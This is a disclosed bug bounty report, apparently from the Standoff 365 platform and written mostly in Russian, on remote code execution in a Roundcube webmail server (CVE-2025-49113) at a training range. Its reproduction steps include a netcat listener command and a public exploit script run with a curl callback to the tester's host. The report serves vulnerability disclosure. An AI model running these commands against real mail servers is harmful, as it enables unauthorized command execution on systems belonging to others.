RCE in roundcube mail at Standoff hackbase
Где обнаружено
Здравствуйте! Обнаружил уязвимость RCE на почте для фишинга Standoff Hackbase.
Описание уязвимости
Версия roundcube подвержена уязвимости CVE-2025-49113
Шаги воспроизведения
- Создать аккаунт и получить почту для фишинга.
- Подключится по VPN и зайти на почту.
- Поднять локальный сервер
nc -lnvp 4444
- Запустить
php .\CVE-2025-49113.php http://10.127.2.170 [LOGIN] [PASS] "curl http://[IP]:4444"
Влияние на безопасность
Исполнение команд на сервере.
Дополнительные ссылки
https://github.com/fearsoff-org/CVE-2025-49113/
Видео PoC прикрепил.
Видео PoC прикрепил.
Standoff 365
Standoff 365
Report No.: 11778
Created: June 6, 18:30
Disclosed: September 2, 13:57
Status: Accepted
Type: Vulnerability
Severity:
Critical
Author:Kevgen